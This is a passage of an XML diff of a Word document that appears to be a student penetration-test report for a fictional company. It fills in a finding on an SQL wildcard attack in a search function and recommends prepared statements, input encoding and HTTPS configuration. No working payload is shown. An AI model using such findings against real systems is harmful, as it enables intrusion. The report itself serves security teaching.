+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>)</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>});</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+            </w:pPr>
           </w:p>
         </w:tc>
       </w:tr>
@@ -9644,7 +10194,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="40" w:name="_Toc71393751"/>
+            <w:bookmarkStart w:id="40" w:name="_Toc71399654"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -9686,7 +10236,19 @@
               <w:rPr>
                 <w:b/>
               </w:rPr>
-              <w:t>: An attacker could do xyz with this vulnerability</w:t>
+              <w:t xml:space="preserve">: </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>An attacker c</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>an list out all the trainings in the store.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -9716,7 +10278,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="41" w:name="_Toc71393752"/>
+            <w:bookmarkStart w:id="41" w:name="_Toc71399655"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -9748,14 +10310,26 @@
               <w:widowControl w:val="0"/>
               <w:spacing w:line="240" w:lineRule="auto"/>
               <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>Possible: The possibility of the vulnerability being exploited</w:t>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t xml:space="preserve">Possible: </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Search-related functionalities are common places for SQL wildcard attacks while exploiting this vulnerability requires the attacker to login first</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> so the overall likelihood is said to be possible.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -9785,7 +10359,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="42" w:name="_Toc71393753"/>
+            <w:bookmarkStart w:id="42" w:name="_Toc71399656"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -9833,7 +10407,33 @@
               <w:t xml:space="preserve">: </w:t>
             </w:r>
             <w:r>
-              <w:t>This is the reasoning behind my rating</w:t>
+              <w:t xml:space="preserve">Referring to the risk matrix in </w:t>
+            </w:r>
+            <w:hyperlink w:anchor="_Appendix_I_-" w:history="1">
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Hyperlink"/>
+                </w:rPr>
+                <w:t>Appendix 1</w:t>
+              </w:r>
+            </w:hyperlink>
+            <w:r>
+              <w:t xml:space="preserve">, possible likelihood and </w:t>
+            </w:r>
+            <w:r>
+              <w:t>negligible</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> impact suggest a </w:t>
+            </w:r>
+            <w:r>
+              <w:t>low</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> risk</w:t>
+            </w:r>
+            <w:r>
+              <w:t>. Since an attacker can only leak out information from the current table which contains no sensitive information, it is said to be low-risk.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -9863,7 +10463,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="43" w:name="_Toc71393754"/>
+            <w:bookmarkStart w:id="43" w:name="_Toc71399657"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -9895,14 +10495,14 @@
               <w:widowControl w:val="0"/>
               <w:spacing w:line="240" w:lineRule="auto"/>
               <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>http://example.com</w:t>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>[1] Lecture 5 SQL wildcard attack slides</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -9932,7 +10532,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="44" w:name="_Toc71393755"/>
+            <w:bookmarkStart w:id="44" w:name="_Toc71399658"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -9962,28 +10562,172 @@
           <w:p>
             <w:pPr>
               <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
               <w:spacing w:line="240" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t>The fix goes here</w:t>
-            </w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>U</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>se prepared statements. For example:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>$stmt = $con-&gt;prepare("SELECT * FROM Users WHERE username = ?");</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>$stmt-&gt;bind_param("s", $_GET["username"]);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>$stmt-&gt;execute();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>$stmt-&gt;close();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+            </w:pPr>
           </w:p>
         </w:tc>
       </w:tr>
     </w:tbl>
     <w:p/>
-    <w:p/>
     <w:p>
-      <w:r>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="45" w:name="_Appendix_I_-"/>
-      <w:bookmarkStart w:id="46" w:name="_Toc71393756"/>
+      <w:bookmarkStart w:id="46" w:name="_Toc71399659"/>
       <w:bookmarkEnd w:id="45"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -10053,7 +10797,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="47" w:name="_Toc71393757"/>
+      <w:bookmarkStart w:id="47" w:name="_Toc71399660"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Appendix 2 - Additional Information</w:t>
@@ -10075,7 +10819,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="48" w:name="_Section_1_–"/>
-      <w:bookmarkStart w:id="49" w:name="_Toc71393758"/>
+      <w:bookmarkStart w:id="49" w:name="_Toc71399661"/>
       <w:bookmarkEnd w:id="48"/>
       <w:r>
         <w:rPr>
@@ -10823,7 +11567,6 @@
                 <w:rFonts w:hint="eastAsia"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>3</w:t>
             </w:r>
           </w:p>
@@ -12109,7 +12852,7 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:bookmarkStart w:id="50" w:name="_Section2_–_stored"/>
-      <w:bookmarkStart w:id="51" w:name="_Toc71393759"/>
+      <w:bookmarkStart w:id="51" w:name="_Toc71399662"/>
       <w:bookmarkEnd w:id="50"/>
       <w:r>
         <w:rPr>
@@ -12136,7 +12879,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="52" w:name="_Exploitation_1"/>
-      <w:bookmarkStart w:id="53" w:name="_Toc71393760"/>
+      <w:bookmarkStart w:id="53" w:name="_Toc71399663"/>
       <w:bookmarkEnd w:id="52"/>
       <w:r>
         <w:rPr>
@@ -13316,7 +14059,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="54" w:name="_Exploitation_2"/>
-      <w:bookmarkStart w:id="55" w:name="_Toc71393761"/>
+      <w:bookmarkStart w:id="55" w:name="_Toc71399664"/>
       <w:bookmarkEnd w:id="54"/>
       <w:r>
         <w:rPr>
@@ -13829,7 +14572,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="56" w:name="_Section_3_–"/>
-      <w:bookmarkStart w:id="57" w:name="_Toc71393762"/>
+      <w:bookmarkStart w:id="57" w:name="_Toc71399665"/>
       <w:bookmarkEnd w:id="56"/>
       <w:r>
         <w:rPr>
@@ -16612,6 +17355,41 @@
     <w:basedOn w:val="DefaultParagraphFont"/>
     <w:rsid w:val="00EF0E63"/>
   </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="message-body">
+    <w:name w:val="message-body"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:rsid w:val="00C36365"/>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="cm-variable">
+    <w:name w:val="cm-variable"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:rsid w:val="00C36365"/>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="cm-property">
+    <w:name w:val="cm-property"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:rsid w:val="00C36365"/>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="cm-string">
+    <w:name w:val="cm-string"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:rsid w:val="00C36365"/>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="cm-def">
+    <w:name w:val="cm-def"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:rsid w:val="00C36365"/>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="cm-operator">
+    <w:name w:val="cm-operator"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:rsid w:val="00C36365"/>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="cm-variable-2">
+    <w:name w:val="cm-variable-2"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:rsid w:val="00C36365"/>
+  </w:style>
 </w:styles>
 </file>
 

</xml_diff>

<commit_message>
Update Assignment 2 Pentest Report.docx
</commit_message>
<xml_diff>
--- a/Assignment 2 Pentest Report.docx
+++ b/Assignment 2 Pentest Report.docx
@@ -72,23 +72,13 @@
           <w:szCs w:val="48"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:sz w:val="48"/>
           <w:szCs w:val="48"/>
         </w:rPr>
-        <w:t>PleaseHold</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Pty. Ltd.</w:t>
+        <w:t>PleaseHold Pty. Ltd.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -291,15 +281,7 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve"> at the request of </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>PleaseHold</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Pty. Ltd.</w:t>
+        <w:t xml:space="preserve"> at the request of PleaseHold Pty. Ltd.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -782,21 +764,7 @@
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Since </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>PleaseHold</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> deals with banks and telecommunication companies who always put security at the first place, it is recommended to have HTTPS enabled to inspire trusts from business partners.</w:t>
+        <w:t xml:space="preserve"> Since PleaseHold deals with banks and telecommunication companies who always put security at the first place, it is recommended to have HTTPS enabled to inspire trusts from business partners.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6417,43 +6385,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>stmt</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> = $con-&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>prepare(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>"SELECT * FROM Users WHERE username = ?");</w:t>
+              <w:t>$stmt = $con-&gt;prepare("SELECT * FROM Users WHERE username = ?");</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6481,61 +6413,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>stmt</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>-&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>bind_</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>param</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>"s", $_GET["username"]);</w:t>
+              <w:t>$stmt-&gt;bind_param("s", $_GET["username"]);</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6563,43 +6441,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>stmt</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>-&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>execute(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>);</w:t>
+              <w:t>$stmt-&gt;execute();</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6627,43 +6469,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>stmt</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>-&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>close(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>);</w:t>
+              <w:t>$stmt-&gt;close();</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -7747,27 +7553,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">$question = </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>htmlentities</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>($_POST["question"])</w:t>
+              <w:t>$question = htmlentities($_POST["question"])</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -9557,7 +9343,6 @@
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -9565,37 +9350,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>LoadModule</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>ssl_module</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> modules/mod_ssl.so</w:t>
+              <w:t>LoadModule ssl_module modules/mod_ssl.so</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -9671,27 +9426,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>&lt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>VirtualHost</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> *:443&gt;</w:t>
+              <w:t>&lt;VirtualHost *:443&gt;</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -9719,27 +9454,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">    </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>ServerName</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> www.example.com</w:t>
+              <w:t xml:space="preserve">    ServerName www.example.com</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -9767,27 +9482,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">    </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>SSLEngine</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> on</w:t>
+              <w:t xml:space="preserve">    SSLEngine on</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -9815,27 +9510,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">    </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>SSLCertificateFile</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
